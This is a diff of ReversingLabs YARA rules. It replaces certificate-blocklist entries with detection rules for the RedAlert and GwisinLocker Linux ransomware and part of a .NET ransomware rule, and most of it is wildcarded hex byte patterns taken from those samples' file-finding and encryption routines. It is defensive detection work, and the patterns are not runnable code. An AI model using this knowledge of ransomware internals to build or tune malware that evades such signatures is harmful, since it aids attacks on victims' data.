+            0C 08 72 ?? ?? ?? ?? 03 07 9A 28 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0D 09 13 ?? 16 13 ?? 2B
+            ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 05 28 ?? ?? ?? ?? 1E
+            8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ??
+            11 ?? 8E 69 32 ?? 07 17 58 0B 07 03 8E 69 32 ?? 06 17 58 0A 06 02 8E 69 3F ?? ?? ?? ??
+            2A
+        }
+		$collect_env_and_start_enc_proc = {
+            19 8D ?? ?? ?? ?? 0B 07 16 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 17 1B
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 18 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? A2 07 1F ?? 8D ?? ?? ?? ?? 0C 08 16 72 ?? ?? ?? ?? A2 08 17 72 ?? ??
+            ?? ?? A2 08 18 72 ?? ?? ?? ?? A2 08 19 72 ?? ?? ?? ?? A2 08 1A 72 ?? ?? ?? ?? A2 08 1B
+            72 ?? ?? ?? ?? A2 08 1C 72 ?? ?? ?? ?? A2 08 1D 72 ?? ?? ?? ?? A2 08 1E 72 ?? ?? ?? ??
+            A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08
+            1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ??
+            72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ??
+            ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ??
+            ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 72 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A
+            06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 72 ?? ?? ?? ?? 16
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Laizhou wanlei stone Co., LTD" and pe.signatures [ i ] . serial == "4f:da:1e:12:1b:61:ad:ec:a9:36:a6:ae:be:07:93:03" and 1310687999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $collect_env_and_start_enc_proc ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_03866Deb183Abfbf4Ff458D4De7Bd73A : INFO FILE
+rule REVERSINGLABS_Linux_Ransomware_Redalert : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects RedAlert ransomware."
 		author = "ReversingLabs"
-		id = "2641eb86-94f0-537c-a82a-6a5e1596ee84"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "ec7567bf-2c39-529f-ae93-74270a161827"
+		date = "2022-09-01"
+		modified = "2022-09-01"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2450-L2466"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Linux.Ransomware.RedAlert.yara#L1-L146"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "90d09d0d2d01500e0670277d0e8de574feecf7443cf4d077912b1166a9c14c43"
+		logic_hash = "fe0d10c2ef1dacdb5374f319e470274b91f4f171db49de8c89e8aaa9aa75a45c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "RedAlert"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            41 57 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 74 24 ?? BE ?? ?? ?? ?? 48
+            89 54 24 ?? 48 89 4C 24 ?? 4C 89 44 24 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 C5 75 ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 89 C3 75 ?? BF ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 48 8D 54 24 ??
+            89 C6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C0 75 ?? BF ?? ?? ?? ?? EB ?? 4C 8B B4 24 ??
+            ?? ?? ?? 4D 85 F6 7F ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? EB ?? 49
+            81 FE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 97 44 24 ?? 49 81 FE ?? ?? ?? ?? 0F 97
+            44 24 ?? 80 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 4C 89 F0 C7 44 24 ?? ?? ?? ?? ?? 48 89
+            D3 31 D2 48 F7 F3 48 6B C8 ?? 48 89 4C 24 ?? 49 81 FE ?? ?? ?? ?? 77 ?? 4D 89 F4 41
+            BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 41 BC ?? ?? ?? ?? 45 31 ED C7 44 24 ??
+            ?? ?? ?? ?? 4D 63 FD C7 44 24 ?? ?? ?? ?? ?? 4C 0F AF 7C 24 ?? E9 ?? ?? ?? ?? 80 7C
+            24 ?? ?? 74 ?? 45 85 ED 74 ?? 80 7C 24 ?? ?? 74 ?? 41 8D 45 ?? 3B 44 24 ?? 4C 89 FE
+            75 ?? 49 8D B6 ?? ?? ?? ?? EB ?? 31 F6 31 D2 48 89 EF E8 ?? ?? ?? ?? 48 63 7C 24 ??
+            48 89 E9 4C 89 E2 48 03 7C 24 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 39 E0 74 ?? BF ??
+            ?? ?? ?? EB ?? 44 01 64 24 ?? 41 FF C5 44 3B 6C 24 ?? 0F 85 ?? ?? ?? ?? 48 8D 9C 24
+            ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 84 C0 74 ?? BF ??
+            ?? ?? ?? EB ?? 48 8D BC 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 85 C0
+            74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 63 6C 24 ?? 45 89 E7 44 89 64 24 ?? 4C 0F AF
+            6C 24 ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B 4C 24 ?? 41 B8
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 84
+        }
+		$encrypt_files_p2 = {
+            C0 75 ?? 48 8B 54 24 ?? 48 8B 7C 24 ?? 48 89 E9 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7
+            15 ?? ?? ?? ?? 48 39 D0 75 ?? 48 8B 44 24 ?? 48 89 E9 BE ?? ?? ?? ?? 0F B7 50 ?? 48
+            8B 38 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F B7 51 ?? 48 39 D0 74 ?? BF ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 4C 03 7C 24 ?? 44 3B 6C 24 ?? 0F 8C ?? ?? ?? ?? E9
+            ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 80 7C
+            24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? 80 7C 24 ?? ?? 74 ?? 8B 44 24 ?? 4C 89 EE FF C0
+            3B 44 24 ?? 75 ?? 49 8D B6 ?? ?? ?? ?? EB ?? 31 F6 31 D2 48 89 EF E8 ?? ?? ?? ?? 48
+            63 44 24 ?? 48 8B 5C 24 ?? 48 8D B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 31 C9 31
+            D2 45 89 E1 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 01 C3 48 8D 84 24 ??
+            ?? ?? ?? 49 89 D8 48 89 1C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            48 89 E9 4C 89 E2 BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 39 E0 0F 85 ?? ?? ?? ??
+            FF 44 24 ?? 8B 54 24 ?? 8B 4C 24 ?? 01 54 24 ?? 39 4C 24 ?? 75 ?? 31 F6 BA ?? ?? ??
+            ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 E9 BA ?? ?? ?? ?? BE ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8A 5C 24 ?? 48 83 F8 ?? B0 ?? 0F 44 D8 44 3B 7C 24 ?? 88 5C 24
+            ?? 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 44 03 7C 24 ?? 4C 03 6C 24 ?? 8B 44 24 ?? 39
+            44 24 ?? 0F 8C ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 0F B6 44 24 ?? 48 81 C4 ?? ?? ??
+            ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$find_files_p1 = {
+            41 57 FC 41 56 41 55 41 54 49 89 FC 55 53 48 83 EC ?? 48 8B 84 24 ?? ?? ?? ?? 48 89
+            4C 24 ?? 48 83 C9 ?? 48 89 74 24 ?? 4C 89 44 24 ?? 4C 89 4C 24 ?? 88 54 24 ?? 48 89
+            44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 44 8A BC 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24
+            ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 31 C0 F2 AE 4C 89
+            E7 48 F7 D1 4C 8D 71 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 85 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 48 83 C4 ?? 4C 89 E6 48 89 C2 5B 5D 41 5C 41 5D 41
+            5E 41 5F BF ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 45 84 FF 48 8D 6B ?? 74 ?? 0F B6 4B ??
+            48 89 EA 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 80 7B ?? ?? 0F 85 ?? ?? ?? ??
+            80 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84
+            ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BE ?? ??
+            ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FC 31 C0 48 83 C9 ?? 48 89 EF
+            F2 AE 4C 89 F0 48 29 C8 48 3B 44 24 ?? 76 ?? 48 8B 3D ?? ?? ?? ?? 48 89 E9 4C 89 E2
+            BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4B 8D 1C 34 48 89 EE 48 8D 7B ??
+            C6 03 ?? E8 ?? ?? ?? ?? 41 0F B6 C7 4C 8B 4C 24 ?? 4C 8B 44 24 ?? 89 44 24 ?? 48 8B
+            44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 74 24 ?? 4C 89 E7 48 89 44 24 ?? 48 8B
+        }
+		$find_files_p2 = {
+            44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 04 24 E8
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 45 84 FF 0F 85 ?? ?? ?? ?? FC 48 83 C9 ?? 48 89 EF 44 88
+            F8 F2 AE 48 8B 54 24 ?? 48 89 EF 48 89 CB 48 8B 4C 24 ?? 48 F7 D3 48 89 DE 4C 8D 6B
+            ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 48 89 EA 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 4C 89 EA BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 4B 8D 1C 34 48 89 EA 4C
+            89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8D 7B ?? 48 89 EE C6 03 ?? E8 ?? ?? ??
+            ?? 0F B7 0D ?? ?? ?? ?? 4C 89 E7 4C 8B 44 24 ?? 48 8B 54 24 ?? 48 8B 74 24 ?? FF 15
+            ?? ?? ?? ?? 84 C0 BF ?? ?? ?? ?? 74 ?? 48 8B 7C 24 ?? B9 ?? ?? ?? ?? 4C 89 E2 BE ??
+            ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8B 74 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 8D 56 ??
+            4C 89 E6 E8 ?? ?? ?? ?? C6 03 ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 C3 0F
+            85 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F E9
+        }
+		$setup_environment = {
+            55 48 89 E5 41 56 49 89 F6 BE ?? ?? ?? ?? 41 55 41 54 53 48 89 FB 48 83 EC ?? E8 ??
+            ?? ?? ?? 48 85 C0 49 89 C4 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7D ?? E8 ?? ??
+            ?? ?? 84 C0 BF ?? ?? ?? ?? 74 ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49
+            89 C4 74 ?? 0F B7 55 ?? 48 8B 7D ?? 48 89 C1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 55
+            ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 55 ?? 31 C9 39 C2 0F 85
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ??
+            ?? 49 89 E5 E8 ?? ?? ?? ?? 66 8B 3D ?? ?? 22 00 66 03 3D ?? ?? 22 00 66 8B 05 ?? ??
+            22 00 66 89 7D ?? 0F B7 FF 66 89 45 ?? E8 ?? ?? ?? ?? 0F B7 7D ?? 48 89 45 ?? E8 ??
+            ?? ?? ?? 0F B7 55 ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? 48 89 45 ?? E8 ?? ?? ?? ??
+            0F B7 55 ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 75 ?? BF ?? ??
+            ?? ?? 31 C0 E8 ?? ?? ?? ?? 0F B7 45 ?? 0F B7 35 ?? ?? ?? ?? 31 C9 48 8B 7D ?? 48 83
+            C0 ?? 25 ?? ?? ?? ?? 48 29 C4 48 8D 5C 24 ?? 48 83 E3 ?? 48 89 DA E8 ?? ?? ?? ?? 48
+            89 DE BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 0F B7 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 48 03
+            7D ?? E8 ?? ?? ?? ?? 66 39 05 ?? ?? 22 00 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89
+            EC 31 C9 EB ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D 75 ?? B9 ?? ?? ?? ?? 4C 89 F7 FC F3 A5
+            B1 ?? EB ?? 4C 89 EC EB ?? 48 8D 65 ?? 89 C8 5B 41 5C 41 5D 41 5E C9 C3
+        }
+		$make_configuration = {
+            41 56 BE ?? ?? ?? ?? 49 89 FE BF ?? ?? ?? ?? 41 55 41 54 55 53 48 83 EC ?? E8 ?? ??
+            ?? ?? 84 C0 88 C3 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 31 FF EB ?? BF ?? ?? ?? ?? E8
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 0F B7 F0 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? 49 89 C4 48 89 C2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? 66 C7 00
+            ?? ?? C6 40 ?? ?? E8 ?? ?? ?? ?? 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89
+            E6 4C 89 E7 E8 ?? ?? ?? ?? 84 C0 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ??
+            E8 ?? ?? ?? ?? FC 88 D8 BF ?? ?? ?? ?? 48 83 C9 ?? F2 AE 48 F7 D1 48 FF C9 8D 59 ??
+            83 C1 ?? 48 63 F9 E8 ?? ?? ?? ?? 48 85 C0 48 89 C5 0F 84 ?? ?? ?? ?? 48 8D 78 ?? 48
+            63 D3 BE ?? ?? ?? ?? C6 00 ?? E8 ?? ?? ?? ?? 48 89 EF BE ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 85 C0 48 89 C3 BF ?? ?? ?? ?? 74 ?? 0F B7 54 24 ?? 48 8B 7C 24 ?? 48 89 C1 BE ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? BF ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 F7 48 89 E6 B9 ?? ?? ?? ?? FC F3 A5
+            48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E C3 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x87\\x8D\\xE5\\xBA\\x86\\xE8\\xAF\\x9D\\xE8\\xAF\\xAD\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "03:86:6d:eb:18:3a:bf:bf:4f:f4:58:d4:de:7b:d7:3a" and 1371772799 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( $setup_environment ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $make_configuration )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1Be41B34127Ca9E6270830D2070Db426 : INFO FILE
+rule REVERSINGLABS_Linux_Ransomware_Gwisinlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GwisinLocker ransomware."
 		author = "ReversingLabs"
-		id = "bee69e9d-db8e-5d4e-8e97-b3791b4f717d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9f00e1b4-3692-5824-b614-724073532c1f"
+		date = "2022-10-11"
+		modified = "2022-10-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2468-L2484"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Linux.Ransomware.GwisinLocker.yara#L1-L354"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b66c4b9264be70d53838442a3112c4bacbdf2dda90840d71c3eb949e630b3f17"
+		logic_hash = "c23c0b73bbefbd644ffe1398e1f14eec3a89945cb3c3ccbc6f46c57046b53505"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GwisinLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$init_key_v1 = {
+            55 57 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D 74 24 ?? 56 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 31 FF 83 EC ?? 56 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89
+            F8 5B 5E 5F 5D C3 66 90 31 D2 31 C0 89 54 04 ?? 83 C0 ?? 83 F8 ?? 72 ?? 83 EC ?? 8D
+            83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 C5 8D 7C 24 ?? 85
+            C0 74 ?? 50 6A ?? 6A ?? 57 E8 ?? ?? ?? ?? 89 2C 24 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ??
+            6A ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? C7 04 24 ?? ?? ?? ?? 83 EC ?? 8D 44
+            24 ?? 50 FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 6A ?? FF B3
+            ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 56 FF B3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            0F 94 C0 0F B6 C0 89 C7 E9
+        }
+		$encrypt_files_v1_p1 = {
+            55 B9 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8B 84
+            24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 84 24
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 83 EC ?? 89 44 24 ?? 89
+            C7 31 C0 F3 AB C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? 6A ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 89 44
+            24 ?? 8D 84 24 ?? ?? ?? ?? 89 44 24 ?? 31 FF 83 EC ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8
+            ?? ?? ?? ?? 58 5A 6A ?? FF 74 24 ?? E8 ?? ?? ?? ?? 59 5E 6A ?? FF 74 24 ?? E8 ?? ??
+            ?? ?? 81 C4 ?? ?? ?? ?? 89 F8 5B 5E 5F 5D C3 8D 74 26 ?? 90 83 EC ?? 6A ?? 8D 84 24
+            ?? ?? ?? ?? 89 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D B4 24 ?? ?? ?? ?? 89 74 24 ??
+            85 C0 74 ?? 83 EC ?? 6A ?? FF 74 24 ?? 56 E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 59 5E 50
+            89 C5 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? 89 C6 83 C4 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 89 C7 FF B4 24 ??
+            ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 01 FA 89 D0 8B 54
+            24 ?? 89 10 0F B7 54 24 ?? 66 89 50 ?? 0F B6 54 24 ?? 88 50 ?? 8B 94 24 ?? ?? ?? ??
+            C6 44 3A ?? ?? BF ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ??
+            ?? ?? ?? B9 ?? ?? ?? ?? 83 C4 ?? 39 C1 B9 ?? ?? ?? ?? 19 D1 7D ?? 83 EC ?? FF B4 24
+            ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? FF 74
+            24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 74 26 ?? 90 83 EC ?? 56 E8 ?? ?? ??
+            ?? 58 5A 55 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? 89 C6 83 C4 ?? 85 C0 0F
+        }
+		$encrypt_files_v1_p2 = {
+            84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 8B 74 24
+            ?? 8B 7C 24 ?? 89 D1 89 74 24 ?? 89 7C 24 ?? 83 C4 ?? 39 F0 19 F9 7D ?? 89 44 24 ??
+            89 54 24 ?? 8B 7C 24 ?? 8B 74 24 ?? 89 F9 89 F5 C1 F9 ?? 89 C8 89 4C 24 ?? 31 CD 8B
+            74 24 ?? C1 F8 ?? 89 44 24 ?? 89 E8 29 F0 8B 74 24 ?? 89 C7 83 E7 ?? 31 CF 89 F8 8B
+            7C 24 ?? 29 F0 8B 74 24 ?? 89 FA 19 FA 8B 7C 24 ?? 29 C6 89 74 24 ?? 19 D7 83 EC ??
+            89 7C 24 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ??
+            B9 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 31 C0 F3 AB 89 94 24 ?? ?? ?? ?? 56 6A ?? FF 74
+            24 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 C7 85 C0 0F 84 ?? ?? ?? ?? 83
+            EC ?? FF 74 24 ?? E8 ?? ?? ?? ?? 5F 5D FF B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 89 C7 85 C0 0F 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 8B 54 24 ?? 31 FF 8B 44 24 ??
+            89 7C 24 ?? 89 74 24 ?? 8D 74 24 ?? 89 D7 89 74 24 ?? 8D B3 ?? ?? ?? ?? 09 C7 89 74
+        }
+		$encrypt_files_v1_p3 = {
+            24 ?? 0F 84 ?? ?? ?? ?? 8B 4C 24 ?? 8B 6C 24 ?? 89 4C 24 ?? EB ?? 66 90 83 EC ?? 31
+            ED FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF 74 24 ?? FF 74
+            24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 31 D2 6A ?? 8B 84 24 ?? ?? ?? ?? 52 F7 D8
+            50 57 E8 ?? ?? ?? ?? 57 FF B4 24 ?? ?? ?? ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 44 24 ?? 8B BC 24 ?? ?? ?? ?? 8B 54 24 ?? 29 F8 19 EA 89 44 24 ?? 89 D6 89 54
+            24 ?? 83 C4 ?? 09 C6 74 ?? 39 84 24 ?? ?? ?? ?? 89 E9 8B 7C 24 ?? 19 D1 0F 4C 84 24
+            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ??
